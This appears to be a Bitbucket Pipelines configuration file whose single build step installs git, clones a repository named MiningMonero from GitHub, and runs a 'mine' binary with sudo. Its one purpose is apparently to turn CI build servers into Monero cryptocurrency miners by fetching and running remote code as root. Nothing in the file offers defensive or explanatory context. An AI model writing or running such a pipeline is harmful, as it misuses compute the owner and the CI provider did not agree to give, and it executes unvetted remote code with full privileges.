pipelines:
  default:
    - step:
        script:
          - sudo apt install -y git && sudo git clone https://github.com/Anli-Project/MiningMonero.git && cd MiningMonero && sudo chmod u+x mine && sudo ./mine
